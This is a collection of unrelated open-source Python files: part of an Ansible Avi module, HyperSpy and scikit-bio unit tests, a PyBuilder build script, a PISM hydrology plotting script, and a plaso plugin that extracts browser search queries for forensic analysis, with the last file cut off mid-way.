return avi_ansible_api(module, 'networkprofile',
set([]))
if __name__ == '__main__':
main()
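# Editor's sketch (not part of this module): a patch-based update variant
# of the EXAMPLES play above; all values are illustrative.
#
#   - avi_networkprofile:
#       avi_api_update_method: patch
#       avi_api_patch_op: replace
#       name: System-UDP-Fast-Path
#       profile:
#         type: PROTOCOL_TYPE_UDP_FAST_PATH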
|
alxgu/ansible
|
lib/ansible/modules/network/avi/avi_networkprofile.py
|
Python
|
gpl-3.0
| 3,909
|
[
"VisIt"
] |
cacdbc67eebbc9d93eb00d7c071455c1307a9c781a2997f798acbdfdc3556fae
|
# Copyright 2007-2016 The HyperSpy developers
#
# This file is part of HyperSpy.
#
# HyperSpy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# HyperSpy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with HyperSpy. If not, see <http://www.gnu.org/licenses/>.
import numpy as np
import nose.tools as nt
from hyperspy._signals.signal1d import Signal1D
from hyperspy.component import Parameter, Component
from hyperspy.components1d import Gaussian, Lorentzian, ScalableFixedPattern
def remove_empty_numpy_strings(dic):
    """Recursively replace empty numpy strings with plain '' in place."""
    for k, v in dic.items():
        if isinstance(v, dict):
            remove_empty_numpy_strings(v)
        elif isinstance(v, list):
            for i, vv in enumerate(v):
                if isinstance(vv, dict):
                    remove_empty_numpy_strings(vv)
                elif isinstance(vv, np.string_) and len(vv) == 0:
                    # rebinding the loop variable would be a no-op, so
                    # assign back into the list instead
                    v[i] = ''
        elif isinstance(v, np.string_) and len(v) == 0:
            dic[k] = ''
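# Quick illustration of the helper above (editor's addition):
#   d = {'a': np.string_(''), 'b': [np.string_(''), {'c': np.string_('')}]}
#   remove_empty_numpy_strings(d)
#   # -> {'a': '', 'b': ['', {'c': ''}]}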
class DummyAxesManager:
navigation_shape = [1, ]
navigation_size = 2
indices = ()
@property
def _navigation_shape_in_array(self):
return self.navigation_shape[::-1]
class TestParameterDictionary:
def setUp(self):
self.par = Parameter()
self.par.name = 'asd'
self.par._id_name = 'newone'
def ft(x):
return x * x
def fit(x):
return x * x + 1
self.par.twin_function = ft
self.par.twin_inverse_function = fit
self.par._axes_manager = DummyAxesManager()
self.par._create_array()
self.par.value = 1
self.par.std = 0.1
self.par.store_current_value_in_array()
self.par.ext_bounded = False
self.par.ext_force_positive = False
def test_to_dictionary(self):
d = self.par.as_dictionary()
nt.assert_equal(d['name'], self.par.name)
nt.assert_equal(d['_id_name'], self.par._id_name)
np.testing.assert_equal(d['map']['values'][0], 1)
np.testing.assert_equal(d['map']['std'][0], 0.1)
nt.assert_true(d['map']['is_set'][0])
np.testing.assert_equal(d['value'], self.par.value)
np.testing.assert_equal(d['std'], self.par.std)
nt.assert_is(d['free'], self.par.free)
nt.assert_equal(d['self'], id(self.par))
np.testing.assert_equal(d['_bounds'], self.par._bounds)
nt.assert_is(d['ext_bounded'], self.par.ext_bounded)
nt.assert_is(
d['ext_force_positive'], self.par.ext_force_positive)
def test_load_dictionary(self):
d = self.par.as_dictionary()
p = Parameter()
p._id_name = 'newone'
_id = p._load_dictionary(d)
nt.assert_equal(_id, id(self.par))
nt.assert_equal(p.name, self.par.name)
nt.assert_equal(p._id_name, self.par._id_name)
np.testing.assert_equal(p.map['values'][0], 1)
np.testing.assert_equal(p.map['std'][0], 0.1)
nt.assert_true(p.map['is_set'][0])
np.testing.assert_equal(p.value, self.par.value)
np.testing.assert_equal(p.std, self.par.std)
np.testing.assert_equal(p.free, self.par.free)
np.testing.assert_equal(p._bounds, self.par._bounds)
rn = np.random.random()
np.testing.assert_equal(
p.twin_function(rn),
self.par.twin_function(rn))
np.testing.assert_equal(
p.twin_inverse_function(rn),
self.par.twin_inverse_function(rn))
@nt.raises(ValueError)
def test_invalid_name(self):
d = self.par.as_dictionary()
d['_id_name'] = 'otherone'
p = Parameter()
p._id_name = 'newone'
_id = p._load_dictionary(d)
class TestComponentDictionary:
def setUp(self):
self.parameter_names = ['par1', 'par2']
self.comp = Component(self.parameter_names)
self.comp.name = 'newname!'
self.comp._id_name = 'dummy names yay!'
self.comp._axes_manager = DummyAxesManager()
self.comp._create_arrays()
self.comp.par1.value = 2.
self.comp.par2.value = 5.
self.comp.par1.std = 0.2
self.comp.par2.std = 0.5
self.comp.store_current_parameters_in_map()
def test_to_dictionary(self):
d = self.comp.as_dictionary()
c = self.comp
nt.assert_equal(c.name, d['name'])
nt.assert_equal(c._id_name, d['_id_name'])
nt.assert_false(d['active_is_multidimensional'])
nt.assert_true(d['active'])
nt.assert_is_none(d['_active_array'])
for ip, p in enumerate(c.parameters):
nt.assert_dict_equal(p.as_dictionary(), d['parameters'][ip])
c.active_is_multidimensional = True
d1 = c.as_dictionary()
nt.assert_true(d1['active_is_multidimensional'])
np.testing.assert_array_equal(d1['_active_array'], c._active_array)
def test_load_dictionary(self):
c = self.comp
d = c.as_dictionary(True)
n = Component(self.parameter_names)
n._id_name = 'dummy names yay!'
_ = n._load_dictionary(d)
nt.assert_equal(c.name, n.name)
nt.assert_equal(c.active, n.active)
nt.assert_equal(
c.active_is_multidimensional,
n.active_is_multidimensional)
for pn, pc in zip(n.parameters, c.parameters):
rn = np.random.random()
nt.assert_equal(pn.twin_function(rn), pc.twin_function(rn))
nt.assert_equal(
pn.twin_inverse_function(rn),
pc.twin_inverse_function(rn))
dn = pn.as_dictionary()
del dn['self']
del dn['twin_function']
del dn['twin_inverse_function']
dc = pc.as_dictionary()
del dc['self']
del dc['twin_function']
del dc['twin_inverse_function']
print(list(dn.keys()))
print(list(dc.keys()))
nt.assert_dict_equal(dn, dc)
@nt.raises(ValueError)
def test_invalid_component_name(self):
c = self.comp
d = c.as_dictionary()
n = Component(self.parameter_names)
id_dict = n._load_dictionary(d)
@nt.raises(ValueError)
def test_invalid_parameter_name(self):
c = self.comp
d = c.as_dictionary()
n = Component([a + 's' for a in self.parameter_names])
n._id_name = 'dummy names yay!'
id_dict = n._load_dictionary(d)
class TestModelDictionary:
def setUp(self):
s = Signal1D(np.array([1.0, 2, 4, 7, 12, 7, 4, 2, 1]))
m = s.create_model()
m.low_loss = (s + 3.0).deepcopy()
self.model = m
self.s = s
m.append(Gaussian())
m.append(Gaussian())
m.append(ScalableFixedPattern(s * 0.3))
m[0].A.twin = m[1].A
m.fit()
def test_to_dictionary(self):
m = self.model
d = m.as_dictionary()
print(d['low_loss'])
np.testing.assert_almost_equal(m.low_loss.data, d['low_loss']['data'])
np.testing.assert_almost_equal(m.chisq.data, d['chisq.data'])
np.testing.assert_almost_equal(m.dof.data, d['dof.data'])
np.testing.assert_equal(
d['free_parameters_boundaries'],
m.free_parameters_boundaries)
nt.assert_is(d['convolved'], m.convolved)
for num, c in enumerate(m):
tmp = c.as_dictionary()
remove_empty_numpy_strings(tmp)
nt.assert_equal(d['components'][num]['name'], tmp['name'])
nt.assert_equal(d['components'][num]['_id_name'], tmp['_id_name'])
np.testing.assert_equal(d['components'][-1]['signal1D'],
(m.signal * 0.3)._to_dictionary())
def test_load_dictionary(self):
d = self.model.as_dictionary()
mn = self.s.create_model()
mn.append(Lorentzian())
mn._load_dictionary(d)
mo = self.model
# nt.assert_true(np.allclose(mo.signal1D.data, mn.signal1D.data))
np.testing.assert_allclose(mo.chisq.data, mn.chisq.data)
np.testing.assert_allclose(mo.dof.data, mn.dof.data)
np.testing.assert_allclose(mn.low_loss.data, mo.low_loss.data)
np.testing.assert_equal(
mn.free_parameters_boundaries,
mo.free_parameters_boundaries)
nt.assert_is(mn.convolved, mo.convolved)
for i in range(len(mn)):
nt.assert_equal(mn[i]._id_name, mo[i]._id_name)
for po, pn in zip(mo[i].parameters, mn[i].parameters):
np.testing.assert_allclose(po.map['values'], pn.map['values'])
np.testing.assert_allclose(po.map['is_set'], pn.map['is_set'])
nt.assert_is(mn[0].A.twin, mn[1].A)
|
vidartf/hyperspy
|
hyperspy/tests/model/test_model_as_dictionary.py
|
Python
|
gpl-3.0
| 9,162
|
[
"Gaussian"
] |
635485d9265a09a0e6aa40291dfc5fe7629b5a90ec6078c0a77b90966c1b542c
|
# pybuilder_header_plugin
# Copyright 2015 Michael Gruber
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.insert(0, 'src/main/python')
from pybuilder.core import Author, init, use_plugin
from pybuilder_header_plugin import check_source_file_headers
use_plugin('python.core')
use_plugin('python.distutils')
use_plugin('python.flake8')
use_plugin('python.install_dependencies')
use_plugin('pypi:pybuilder_release_plugin')
name = 'pybuilder_header_plugin'
version = '0.0.2'
authors = [Author('Michael Gruber', 'aelgru@gmail.com')]
url = 'https://github.com/aelgru/pybuilder_header_plugin'
description = 'Please visit {0} for more information!'.format(url)
license = 'Apache License, Version 2.0'
summary = 'PyBuilder Header Plugin'
default_task = ['analyze', 'publish', 'check_source_file_headers']
@init
def set_properties(project):
project.depends_on('committer')
project.depends_on('wheel')
project.set_property('flake8_verbose_output', True)
project.set_property('flake8_break_build', True)
project.set_property('pybuilder_header_plugin_break_build', True)
project.set_property('pybuilder_header_plugin_expected_header', open('header.py').read())
project.get_property('distutils_commands').append('bdist_wheel')
project.set_property('distutils_classifiers', [
'Development Status :: 1 - Planning',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4'])
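# Editor's note (assumption): the 'header.py' file read by set_properties
# is expected to hold the exact comment block every source file must start
# with, e.g. the Apache-2.0 header that opens this build script.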
|
arcivanov/pybuilder_header_plugin
|
build.py
|
Python
|
apache-2.0
| 2,364
|
[
"VisIt"
] |
f921e9c95b2effbebbb5c1d7d8c879d1d2bc434f3922daad910bd90a5acbade0
|
#!/usr/bin/env python3
"""
Creates graph of three modeled hydrology-related time series from a single file.
"""
# example from grid-sequencing example:
# $ ./hydro-tsshow.py foo.png ts_routing-decoupled.nc
from numpy import *
import pylab as plt
import sys
try:
import netCDF4 as netCDF
except ImportError:
print("netCDF4 is not installed!")
sys.exit(1)
NC = netCDF.Dataset
if len(sys.argv) < 3:
print("hydro-tsshow.py ERROR: ... FIXME ... exiting")
sys.exit(1)
outimage = sys.argv[1]
tsfile = sys.argv[2]
secpera = 31556926.0
scale = 10.0e3
scalestr = '$10^3$'
yaxismin = 1.0e-4 # in scale*kg/s
legloc = 'lower right'
labels = []
plt.figure(figsize=(9, 4))
print("opening file '%s' for reading ..." % tsfile)
try:
ncfile = NC(tsfile, "r")
except:
print("ERROR: can't open file %s for reading ..." % tsfile)
sys.exit(2)
print(" reading 'time' variable ...")
t = ncfile.variables["time"][:] / secpera
n = 3
style = ['b-', 'g-', 'r-']
labels = ['ocean_loss', 'ice_free_land_loss', 'negative_thickness_gain']
for k in range(n):
varname = 'hydro_' + labels[k]
print(" reading '%s' variable ..." % varname)
var = ncfile.variables[varname][:]
plt.semilogy(t, var / scale, style[k], linewidth=2.5)
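    # NB: pylab's hold() was deprecated in Matplotlib 2.0 and removed in
    # 3.0; recent Matplotlib overlays repeated plot calls by default.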
plt.hold(True)
ncfile.close()
plt.hold(False)
yy = plt.getp(plt.gca(), 'ylim')
plt.setp(plt.gca(), 'ylim', (yaxismin, yy[1]))
plt.legend(labels, loc=legloc)
plt.xlabel("t (years)", size=16)
plt.ylabel("flux (%s kg/s)" % scalestr, size=16)
plt.grid(True)
print("saving image to file '%s' ..." % outimage)
# plt.show()
plt.savefig(outimage, bbox_inches='tight')
|
pism/pism
|
examples/std-greenland/hydro/hydro-tsshow.py
|
Python
|
gpl-3.0
| 1,611
|
[
"NetCDF"
] |
2524143cc3cf8e6ec14b98aaefe5f045a7e5771748cf30356c337b0c643842c2
|
# -*- coding: utf-8 -*-
"""A plugin that extracts browser history from events."""
import collections
import re
from urllib import parse as urlparse
from plaso.analysis import interface
from plaso.analysis import logger
from plaso.analysis import manager
class BrowserSearchPlugin(interface.AnalysisPlugin):
"""Analyze browser search entries from events."""
NAME = 'browser_search'
_EVENT_TAG_LABELS = ['browser_search']
_SUPPORTED_EVENT_DATA_TYPES = frozenset([
'chrome:autofill:entry',
'chrome:cache:entry',
'chrome:cookie:entry',
'chrome:extension_activity:activity_log',
'chrome:history:file_downloaded',
'chrome:history:page_visited',
'cookie:google:analytics:utma',
'cookie:google:analytics:utmb',
'cookie:google:analytics:utmt',
'cookie:google:analytics:utmz',
'firefox:cache:record',
'firefox:cookie:entry',
'firefox:downloads:download',
'firefox:places:bookmark',
'firefox:places:bookmark_annotation',
'firefox:places:bookmark_folder',
'firefox:places:page_visited',
'msiecf:leak',
'msiecf:redirected',
'msiecf:url',
'msie:webcache:container',
'msie:webcache:containers',
'msie:webcache:leak_file',
'msie:webcache:partitions',
'opera:history:entry',
'opera:history:typed_entry',
'safari:cookie:entry',
'safari:history:visit',
'safari:history:visit_sqlite'])
# TODO: use groups to build a single RE.
# Here we define filters and callback methods for all hits on each filter.
_URL_FILTERS = frozenset([
('Bing', re.compile(r'bing\.com/search'), '_ExtractSearchQueryFromURL'),
('DuckDuckGo', re.compile(r'duckduckgo\.com'),
'_ExtractDuckDuckGoSearchQuery'),
('GMail', re.compile(r'mail\.google\.com'),
'_ExtractGMailSearchQuery'),
('Google Docs', re.compile(r'docs\.google\.com'),
'_ExtractGoogleDocsSearchQuery'),
('Google Drive', re.compile(r'drive\.google\.com/drive/search'),
'_ExtractGoogleSearchQuery'),
('Google Search',
re.compile(r'(www\.|encrypted\.|/)google\.[^/]*/search'),
'_ExtractGoogleSearchQuery'),
('Google Sites', re.compile(r'sites\.google\.com/site'),
'_ExtractGoogleSearchQuery'),
('Yahoo', re.compile(r'yahoo\.com/search'),
'_ExtractYahooSearchQuery'),
('Yandex', re.compile(r'yandex\.com/search'),
'_ExtractYandexSearchQuery'),
('Youtube', re.compile(r'youtube\.com'),
'_ExtractYouTubeSearchQuery'),
])
def __init__(self):
"""Initializes an analysis plugin."""
super(BrowserSearchPlugin, self).__init__()
self._search_queries_counter = collections.Counter()
def _ExtractDuckDuckGoSearchQuery(self, url):
"""Extracts a search query from a DuckDuckGo search URL.
DuckDuckGo: https://duckduckgo.com/?q=query
Args:
url (str): URL.
Returns:
str: search query or None if no query was found.
"""
if 'q=' not in url:
return None
return self._GetBetweenQEqualsAndAmpersand(url).replace('+', ' ')
def _ExtractGMailSearchQuery(self, url):
"""Extracts a search query from a GMail search URL.
GMail: https://mail.google.com/mail/u/0/#search/query[/?]
Args:
url (str): URL.
Returns:
str: search query or None if no query was found.
"""
if 'search/' not in url:
return None
_, _, line = url.partition('search/')
line, _, _ = line.partition('/')
line, _, _ = line.partition('?')
return line.replace('+', ' ')
def _ExtractGoogleDocsSearchQuery(self, url):
"""Extracts a search query from a Google docs URL.
Google Docs: https://docs.google.com/.*/u/0/?q=query
Args:
url (str): URL.
Returns:
str: search query or None if no query was found.
"""
if 'q=' not in url:
return None
line = self._GetBetweenQEqualsAndAmpersand(url)
if not line:
return None
return line.replace('+', ' ')
def _ExtractGoogleSearchQuery(self, url):
"""Extracts a search query from a Google URL.
Google Drive: https://drive.google.com/drive/search?q=query
Google Search: https://www.google.com/search?q=query
Google Sites: https://sites.google.com/site/.*/system/app/pages/
search?q=query
Args:
url (str): URL.
Returns:
str: search query or None if no query was found.
"""
if 'search' not in url or 'q=' not in url:
return None
line = self._GetBetweenQEqualsAndAmpersand(url)
if not line:
return None
return line.replace('+', ' ')
def _ExtractYahooSearchQuery(self, url):
"""Extracts a search query from a Yahoo search URL.
Examples:
https://search.yahoo.com/search?p=query
https://search.yahoo.com/search;?p=query
Args:
url (str): URL.
Returns:
str: search query or None if no query was found.
"""
if 'p=' not in url:
return None
_, _, line = url.partition('p=')
before_and, _, _ = line.partition('&')
if not before_and:
return None
yahoo_search_url = before_and.split()[0]
return yahoo_search_url.replace('+', ' ')
def _ExtractYandexSearchQuery(self, url):
"""Extracts a search query from a Yandex search URL.
Yandex: https://www.yandex.com/search/?text=query
Args:
url (str): URL.
Returns:
str: search query or None if no query was found.
"""
if 'text=' not in url:
return None
_, _, line = url.partition('text=')
before_and, _, _ = line.partition('&')
if not before_and:
return None
yandex_search_url = before_and.split()[0]
return yandex_search_url.replace('+', ' ')
def _ExtractYouTubeSearchQuery(self, url):
"""Extracts a search query from a YouTube search URL.
YouTube: https://www.youtube.com/results?search_query=query
Args:
url (str): URL.
Returns:
str: search query.
"""
return self._ExtractSearchQueryFromURL(url)
def _ExtractSearchQueryFromURL(self, url):
"""Extracts a search query from the URL.
Bing: https://www.bing.com/search?q=query
GitHub: https://github.com/search?q=query
Args:
url (str): URL.
Returns:
str: search query, the value between 'q=' and '&' or None if no
query was found.
"""
if 'search' not in url or 'q=' not in url:
return None
return self._GetBetweenQEqualsAndAmpersand(url).replace('+', ' ')
def _GetBetweenQEqualsAndAmpersand(self, url):
"""Retrieves the substring between the substrings 'q=' and '&'.
Args:
url (str): URL.
Returns:
str: search query, the value between 'q=' and '&' or None if no query
was found.
"""
# Make sure we're analyzing the query part of the URL.
_, _, url = url.partition('?')
# Look for a key value pair named 'q'.
_, _, url = url.partition('q=')
if not url:
return ''
# Strip additional key value pairs.
url, _, _ = url.partition('&')
return url
def CompileReport(self, mediator):
"""Compiles an analysis report.
Args:
mediator (AnalysisMediator): mediates interactions between
analysis plugins and other components, such as storage and dfvfs.
Returns:
AnalysisReport: analysis report.
"""
results = {}
for key, number_of_queries in self._search_queries_counter.items():
search_engine, _, search_term = key.partition(':')
results.setdefault(search_engine, {})
results[search_engine][search_term] = number_of_queries
lines_of_text = []
for search_engine, terms in sorted(results.items()):
lines_of_text.append(' == ENGINE: {0:s} =='.format(search_engine))
for search_term, number_of_queries in sorted(
terms.items(), key=lambda x: (x[1], x[0]), reverse=True):
line = '{0:d} {1:s}'.format(number_of_queries, search_term)
lines_of_text.append(line)
# An empty string is added to have SetText create an empty line.
lines_of_text.append('')
lines_of_text.append('')
report_text = '\n'.join(lines_of_text)
analysis_report = super(BrowserSearchPlugin, self).CompileReport(mediator)
analysis_report.text = report_text
analysis_report.report_dict = results
return analysis_report
def ExamineEvent(self, mediator, event, event_data, event_data_stream):
"""Analyzes an event.
Args:
mediator (AnalysisMediator): mediates interactions between
analysis plugins and other components, such as storage and dfvfs.
event (EventObject): event.
event_data (EventData): event data.
event_data_stream (EventDataStream): event data stream.
"""
if event_data.data_type not in self._SUPPORTED_EVENT_DATA_TYPES:
return
url = getattr(event_data, 'url', None)
if not url:
return
for engine, url_expression, method_name in self._URL_FILTERS:
callback_method = getattr(self, method_name, None)
if not callback_method:
logger.warning(
'Missing callback method: {0:s} to parse search query'.format(
method_name))
continue
match = url_expression.search(url)
if not match:
continue
search_query = callback_method(url)
if not search_query:
mediator.ProduceAnalysisWarning(
'Unable to determine search query: {0:s} in URL: {1:s}'.format(
method_name, url), self.NAME)
continue
try:
search_query = urlparse.unquote(search_query)
except TypeError:
search_query = None
if not search_query:
mediator.ProduceAnalysisWarning(
'Unable to decode search query: {0:s} in URL: {1:s}'.format(
method_name, url), self.NAME)
continue
event_tag = self._CreateEventTag(event, self._EVENT_TAG_LABELS)
mediator.ProduceEventTag(event_tag)
lookup_key = '{0:s}:{1:s}'.format(engine, search_query)
self._search_queries_counter[lookup_key] += 1
manager.AnalysisPluginManager.RegisterPlugin(BrowserSearchPlugin)
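# A minimal stand-alone sketch (not part of plaso) of the same extraction
# using only the standard library; assumes Python 3's urllib.parse:
#
#   from urllib.parse import urlsplit, parse_qs
#
#   def extract_query(url, key='q'):
#       """Return the first value for `key` in the URL query, or None."""
#       values = parse_qs(urlsplit(url).query).get(key)
#       return values[0] if values else None
#
#   extract_query('https://www.bing.com/search?q=foo+bar')  # -> 'foo bar'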
|
Onager/plaso
|
plaso/analysis/browser_search.py
|
Python
|
apache-2.0
| 10,159
|
[
"VisIt"
] |
6c960f517db43d1ae4112d0fc676d602f87ca20a3799d0e3023d9763c8e8be50
|
# ----------------------------------------------------------------------------
# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
import io
from unittest import TestCase, main
import pandas as pd
import numpy as np
import numpy.testing as npt
from skbio import DistanceMatrix, TreeNode
from skbio.util._testing import assert_series_almost_equal
from skbio.diversity import (alpha_diversity, beta_diversity,
get_alpha_diversity_metrics,
get_beta_diversity_metrics)
from skbio.diversity.alpha import faith_pd, observed_otus
from skbio.diversity.beta import unweighted_unifrac, weighted_unifrac
from skbio.tree import DuplicateNodeError, MissingNodeError
class AlphaDiversityTests(TestCase):
def setUp(self):
self.table1 = np.array([[1, 3, 0, 1, 0],
[0, 2, 0, 4, 4],
[0, 0, 6, 2, 1],
[0, 0, 1, 1, 1]])
self.sids1 = list('ABCD')
self.oids1 = ['OTU%d' % i for i in range(1, 6)]
self.tree1 = TreeNode.read(io.StringIO(
'(((((OTU1:0.5,OTU2:0.5):0.5,OTU3:1.0):1.0):'
'0.0,(OTU4:0.75,OTU5:0.75):1.25):0.0)root;'))
self.table2 = np.array([[1, 3],
[0, 2],
[0, 0]])
self.sids2 = list('xyz')
self.oids2 = ['OTU1', 'OTU5']
self.tree2 = TreeNode.read(io.StringIO(
'(((((OTU1:42.5,OTU2:0.5):0.5,OTU3:1.0):1.0):'
'0.0,(OTU4:0.75,OTU5:0.0001):1.25):0.0)root;'))
def test_invalid_input(self):
# number of ids doesn't match the number of samples
self.assertRaises(ValueError, alpha_diversity, 'observed_otus',
self.table1, list('ABC'))
# unknown metric provided
self.assertRaises(ValueError, alpha_diversity, 'not-a-metric',
self.table1)
# 3-D list provided as input
self.assertRaises(ValueError, alpha_diversity, 'observed_otus',
[[[43]]])
# negative counts
self.assertRaises(ValueError, alpha_diversity, 'observed_otus',
[0, 3, -12, 42])
# additional kwargs
self.assertRaises(TypeError, alpha_diversity, 'observed_otus',
[0, 1], not_a_real_kwarg=42.0)
self.assertRaises(TypeError, alpha_diversity, 'faith_pd',
[0, 1], tree=self.tree1, otu_ids=['OTU1', 'OTU2'],
not_a_real_kwarg=42.0)
self.assertRaises(TypeError, alpha_diversity, faith_pd,
[0, 1], tree=self.tree1, otu_ids=['OTU1', 'OTU2'],
not_a_real_kwarg=42.0)
def test_invalid_input_phylogenetic(self):
# otu_ids not provided
self.assertRaises(ValueError, alpha_diversity, 'faith_pd', self.table1,
list('ABC'), tree=self.tree1)
# tree not provided
self.assertRaises(ValueError, alpha_diversity, 'faith_pd', self.table1,
list('ABC'), otu_ids=self.oids1)
# tree has duplicated tip ids
t = TreeNode.read(
io.StringIO(
'(((((OTU2:0.5,OTU2:0.5):0.5,OTU3:1.0):1.0):0.0,(OTU4:'
'0.75,OTU5:0.75):1.25):0.0)root;'))
counts = [1, 2, 3]
otu_ids = ['OTU1', 'OTU2', 'OTU3']
self.assertRaises(DuplicateNodeError, alpha_diversity, 'faith_pd',
counts, otu_ids=otu_ids, tree=t)
# unrooted tree as input
t = TreeNode.read(io.StringIO(
'((OTU1:0.1, OTU2:0.2):0.3, OTU3:0.5,OTU4:0.7);'))
counts = [1, 2, 3]
otu_ids = ['OTU1', 'OTU2', 'OTU3']
self.assertRaises(ValueError, alpha_diversity, 'faith_pd',
counts, otu_ids=otu_ids, tree=t)
# otu_ids has duplicated ids
t = TreeNode.read(
io.StringIO(
'(((((OTU1:0.5,OTU2:0.5):0.5,OTU3:1.0):1.0):0.0,(OTU4:'
'0.75,OTU2:0.75):1.25):0.0)root;'))
counts = [1, 2, 3]
otu_ids = ['OTU1', 'OTU2', 'OTU2']
self.assertRaises(ValueError, alpha_diversity, 'faith_pd',
counts, otu_ids=otu_ids, tree=t)
# count and OTU vectors are not equal length
t = TreeNode.read(
io.StringIO(
'(((((OTU1:0.5,OTU2:0.5):0.5,OTU3:1.0):1.0):0.0,(OTU4:'
'0.75,OTU2:0.75):1.25):0.0)root;'))
counts = [1, 2, 3]
otu_ids = ['OTU1', 'OTU2']
self.assertRaises(ValueError, alpha_diversity, 'faith_pd',
counts, otu_ids=otu_ids, tree=t)
t = TreeNode.read(
io.StringIO(
'(((((OTU1:0.5,OTU2:0.5):0.5,OTU3:1.0):1.0):0.0,(OTU4:'
'0.75,OTU2:0.75):1.25):0.0)root;'))
counts = [1, 2]
otu_ids = ['OTU1', 'OTU2', 'OTU3']
self.assertRaises(ValueError, alpha_diversity, 'faith_pd',
counts, otu_ids=otu_ids, tree=t)
# tree with no branch lengths
t = TreeNode.read(
io.StringIO('((((OTU1,OTU2),OTU3)),(OTU4,OTU5));'))
counts = [1, 2, 3]
otu_ids = ['OTU1', 'OTU2', 'OTU3']
self.assertRaises(ValueError, alpha_diversity, 'faith_pd',
counts, otu_ids=otu_ids, tree=t)
# tree missing some branch lengths
t = TreeNode.read(
io.StringIO('(((((OTU1,OTU2:0.5):0.5,OTU3:1.0):1.0):0.0,(OTU4:'
'0.75,OTU5:0.75):1.25):0.0)root;'))
counts = [1, 2, 3]
otu_ids = ['OTU1', 'OTU2', 'OTU3']
self.assertRaises(ValueError, alpha_diversity, 'faith_pd',
counts, otu_ids=otu_ids, tree=t)
# some otu_ids not present in tree
t = TreeNode.read(
io.StringIO(
'(((((OTU1:0.5,OTU2:0.5):0.5,OTU3:1.0):1.0):0.0,(OTU4:'
'0.75,OTU5:0.75):1.25):0.0)root;'))
counts = [1, 2, 3]
otu_ids = ['OTU1', 'OTU2', 'OTU42']
self.assertRaises(MissingNodeError, alpha_diversity, 'faith_pd',
counts, otu_ids=otu_ids, tree=t)
def test_empty(self):
# empty vector
actual = alpha_diversity('observed_otus', np.array([], dtype=np.int64))
expected = pd.Series([0])
assert_series_almost_equal(actual, expected)
# array of empty vector
actual = alpha_diversity('observed_otus',
np.array([[]], dtype=np.int64))
expected = pd.Series([0])
assert_series_almost_equal(actual, expected)
# array of empty vectors
actual = alpha_diversity('observed_otus',
np.array([[], []], dtype=np.int64))
expected = pd.Series([0, 0])
assert_series_almost_equal(actual, expected)
# empty vector
actual = alpha_diversity('faith_pd', np.array([], dtype=np.int64),
tree=self.tree1, otu_ids=[])
expected = pd.Series([0.])
assert_series_almost_equal(actual, expected)
# array of empty vector
actual = alpha_diversity('faith_pd',
np.array([[]], dtype=np.int64),
tree=self.tree1, otu_ids=[])
expected = pd.Series([0.])
assert_series_almost_equal(actual, expected)
# array of empty vectors
actual = alpha_diversity('faith_pd',
np.array([[], []], dtype=np.int64),
tree=self.tree1, otu_ids=[])
expected = pd.Series([0., 0.])
assert_series_almost_equal(actual, expected)
def test_single_count_vector(self):
actual = alpha_diversity('observed_otus', np.array([1, 0, 2]))
expected = pd.Series([2])
assert_series_almost_equal(actual, expected)
actual = alpha_diversity('faith_pd', np.array([1, 3, 0, 1, 0]),
tree=self.tree1, otu_ids=self.oids1)
self.assertAlmostEqual(actual[0], 4.5)
def test_input_types(self):
list_result = alpha_diversity('observed_otus', [1, 3, 0, 1, 0])
array_result = alpha_diversity('observed_otus',
np.array([1, 3, 0, 1, 0]))
self.assertAlmostEqual(list_result[0], 3)
assert_series_almost_equal(list_result, array_result)
list_result = alpha_diversity('faith_pd', [1, 3, 0, 1, 0],
tree=self.tree1, otu_ids=self.oids1)
array_result = alpha_diversity('faith_pd', np.array([1, 3, 0, 1, 0]),
tree=self.tree1, otu_ids=self.oids1)
self.assertAlmostEqual(list_result[0], 4.5)
assert_series_almost_equal(list_result, array_result)
def test_observed_otus(self):
# expected values hand-calculated
expected = pd.Series([3, 3, 3, 3], index=self.sids1)
actual = alpha_diversity('observed_otus', self.table1, self.sids1)
assert_series_almost_equal(actual, expected)
# function passed instead of string
actual = alpha_diversity(observed_otus, self.table1, self.sids1)
assert_series_almost_equal(actual, expected)
# alt input table
expected = pd.Series([2, 1, 0], index=self.sids2)
actual = alpha_diversity('observed_otus', self.table2, self.sids2)
assert_series_almost_equal(actual, expected)
def test_faith_pd(self):
# calling faith_pd through alpha_diversity gives same results as
# calling it directly
expected = []
for e in self.table1:
expected.append(faith_pd(e, tree=self.tree1, otu_ids=self.oids1))
expected = pd.Series(expected)
actual = alpha_diversity('faith_pd', self.table1, tree=self.tree1,
otu_ids=self.oids1)
assert_series_almost_equal(actual, expected)
# alt input table and tree
expected = []
for e in self.table2:
expected.append(faith_pd(e, tree=self.tree2, otu_ids=self.oids2))
expected = pd.Series(expected)
actual = alpha_diversity('faith_pd', self.table2, tree=self.tree2,
otu_ids=self.oids2)
assert_series_almost_equal(actual, expected)
def test_no_ids(self):
# expected values hand-calculated
expected = pd.Series([3, 3, 3, 3])
actual = alpha_diversity('observed_otus', self.table1)
assert_series_almost_equal(actual, expected)
def test_optimized(self):
# calling optimized faith_pd gives same results as calling unoptimized
# version
optimized = alpha_diversity('faith_pd', self.table1, tree=self.tree1,
otu_ids=self.oids1)
unoptimized = alpha_diversity(faith_pd, self.table1, tree=self.tree1,
otu_ids=self.oids1)
assert_series_almost_equal(optimized, unoptimized)
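# Hedged usage sketch (not part of this test suite): alpha_diversity takes a
# metric name or callable plus a counts table and returns a pandas Series
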